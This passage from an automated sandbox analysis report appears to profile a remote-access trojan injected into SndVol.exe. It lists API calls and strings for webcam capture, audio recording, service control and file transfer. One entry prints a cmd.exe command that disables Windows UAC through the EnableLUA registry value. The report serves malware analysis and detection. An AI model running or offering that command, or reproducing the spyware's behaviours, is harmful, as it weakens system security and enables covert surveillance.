Part of subcall function 0536E1DC: GetLastError.KERNEL32 ref: 0536E24D

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0536E17A
lstrcpyn.KERNEL32(00474B60,0046CF34,00000080), ref: 0536E194
Shell_NotifyIcon.SHELL32(00000000,00474B48), ref: 0536E1AA
TranslateMessage.USER32(?), ref: 0536E1B6
DispatchMessageA.USER32(?), ref: 0536E1C0
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0536E1CD

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID:
API String ID: 1970332568-0
Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction ID: 143623fd5543371f77af5b503548d6e6a9b0ab76e65c1583ea2ce848ba60a919
Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
Instruction Fuzzy Hash: 3B015271800249EBD7109FA5EC4CFABBB7CEB85B01F004029F515970A0D7B8D885CB58

Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0043AC69
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
__allrem.LIBCMT ref: 0043AC9C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
__allrem.LIBCMT ref: 0043ACD1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A

Function 0538B7A9 Relevance: 9.3, APIs: 6, Instructions: 284COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 0538B936
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B952
__allrem.LIBCMT ref: 0538B969
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B987
__allrem.LIBCMT ref: 0538B99E
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0538B9BC

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
Instruction ID: bd3f666cd0ec20ce7431436845718a23da563d06ed05668b87f693c18409cb4d
Opcode Fuzzy Hash: 372230fba1730b24943150f2d9223dcab7b4bce73996abcbaedb59f98a560456
Instruction Fuzzy Hash: 85811A72B04B179BEB29BE79CC55B7AF3E9EF40720F14452AE561D7680E7B0D9008B50

Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000,0040D262), ref: 004044C4

Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C

Strings

CloseCamera, xrefs: 0040458E
FreeFrame, xrefs: 004045B0
GetFrame, xrefs: 0040459F
HNG, xrefs: 004045E6
OpenCamera, xrefs: 00404582

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: H_prologSleep
String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
API String ID: 3469354165-3054508432
Opcode ID: b2183fe930d358898304507f986fb3ab6ddf7ad6d7f92608fdc07342e077fed1
Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
Opcode Fuzzy Hash: b2183fe930d358898304507f986fb3ab6ddf7ad6d7f92608fdc07342e077fed1
Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E

Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00445925
__cftoe.LIBCMT ref: 00445957

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
Opcode Fuzzy Hash: eef5811f0b3e11eaf1bdde4175ac7a9ebfa2f3cd5d18ba66a6432d1456243127
Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C

Function 053965C6 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 053965F2
__cftoe.LIBCMT ref: 05396624

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
Instruction ID: eebb46ae2d44f6db6c136143263412117c967fbb32d86c25ddfb3b3ed789c485
Opcode Fuzzy Hash: 9a4a9018df91bb80547d8cd227be064c11647db9cc7a9b7c485a3b8778a52ece
Instruction Fuzzy Hash: 715139F6A06205ABDF2C9B688C46EBE77E9FF49370F14421EF815E6181DB71D900CA64

Function 05358630 Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,05358CC9,00000000), ref: 05358692
WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,05358CC9,00000000,?,?,0000000A,00000000), ref: 053586DA

Part of subcall function 0535576E: send.WS2_32(?,00000000,00000000,00000000), ref: 05355803

CloseHandle.KERNEL32(00000000,?,00000000,05358CC9,00000000,?,?,0000000A,00000000), ref: 0535871A
MoveFileW.KERNEL32(00000000,00000000), ref: 05358737
CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 05358762
DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 05358772

Part of subcall function 05355863: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,05355916,00000000,00000000,00000000,?,00474EF8,?), ref: 05355872
Part of subcall function 05355863: SetEvent.KERNEL32(00000000), ref: 05355890

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
String ID:
API String ID: 1303771098-0
Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction ID: 53f2c879a2114c55c62af1db6262add03a1ee5eac52717662e7142b469e73fc4
Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
Instruction Fuzzy Hash: 93319F75608341EFC710EF60D888EDBB7A8FF84261F40592DBD8192151DF74AA48CBA6

Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ChangeConfigManager
String ID:
API String ID: 493672254-0
Opcode ID: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
Opcode Fuzzy Hash: efec56fc5935d5a2572c80bdc1daad9799237a8c2fd258714d4154745ff5c6c1
Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE

Function 0536B7DA Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0536B153,00000000), ref: 0536B7E9
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0536B153,00000000), ref: 0536B800
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0536B153,00000000), ref: 0536B80D
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0536B153,00000000), ref: 0536B81C

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction ID: 5f57eee57a279a499c65489d0a378c5f129256f18b9ffccf568f4694cb483391
Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction Fuzzy Hash: 3511E13190021CBBDB21AF64DCC8DFF7B6DEB42AA2B000539FD05D3191DB648D46AAB1

Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
_free.LIBCMT ref: 0044824C
_free.LIBCMT ref: 00448274
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
_abort.LIBCMT ref: 00448293

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD

Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
Opcode Fuzzy Hash: 4ae3873c1f536b49cfb6b65ca2e5a3703e9976f2291b0d96870e63be56c21842
Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9

Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
Opcode Fuzzy Hash: 81e2b4606ab98421978dc9842ef1edfa46dc1b90a9204ca08327dde20b0592b6
Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9

Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
Opcode Fuzzy Hash: fc89c5385e453168767847f65058b20f434ef67782af095c3a641765214ec1d0
Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9

Function 05364722 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 05364789
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 053647B8
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 05364858

Strings

xUG, xrefs: 05364913
TG, xrefs: 053648CA

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: xUG$TG
API String ID: 3554306468-3109661684
Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction ID: 30f453e63ba5ea0257cb6c9b3e68c8c88f3490a6a232e2872f1d645c169196f8
Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
Instruction Fuzzy Hash: 1B511E72E10219AADF15EB94DC94EEFB7BDFF05310F10416AE906E2154EF706A48CBA1

Function 0040186A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 004018BE
ExitThread.KERNEL32 ref: 004018F6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04

Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776

Strings

NG, xrefs: 00401990
PkG, xrefs: 00401888

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: PkG$NG
API String ID: 1649129571-2686071003
Opcode ID: 751e17220fe7e02abd832392d96957ea80d565c9ec878b7494034c10d7dc528b
Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
Opcode Fuzzy Hash: 751e17220fe7e02abd832392d96957ea80d565c9ec878b7494034c10d7dc528b
Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E

Function 053934CE Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PkGNG, xrefs: 053934D0

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: PkGNG
API String ID: 0-263838557
Opcode ID: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
Instruction ID: fe6467e618a11250853fff8233f7962f59545c0602d21cfbb18713bdf1a593c9
Opcode Fuzzy Hash: 6432c744e00329bb486b15d835566ca43a09715d1a124345af01da605e15d9f5
Instruction Fuzzy Hash: C741EBF1B00704AFDB28AF78C845B6ABBF9EF48711F10496AE155DB680E77199418780

Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON

Download Yara Rule

APIs

RegisterClassExA.USER32(00000030), ref: 0041D55B
CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
GetLastError.KERNEL32 ref: 0041D580

Strings

MsgWindowClass, xrefs: 0041D526
0, xrefs: 0041D52B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ClassCreateErrorLastRegisterWindow
String ID: 0$MsgWindowClass
API String ID: 2877667751-2410386613
Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4

Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
CloseHandle.KERNEL32(?), ref: 004077AA
CloseHandle.KERNEL32(?), ref: 004077AF

Strings

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
C:\Windows\System32\cmd.exe, xrefs: 00407796

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess
String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
API String ID: 2922976086-4183131282
Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9

Function 00407260 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\SndVol.exe, xrefs: 004076C4
Rmc-TLPQMO, xrefs: 004076DA

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Windows\SysWOW64\SndVol.exe$Rmc-TLPQMO
API String ID: 0-3891208019
Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E

Function 0044333A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390

Strings

mscoree.dll, xrefs: 00443353
CorExitProcess, xrefs: 00443365

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98

Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
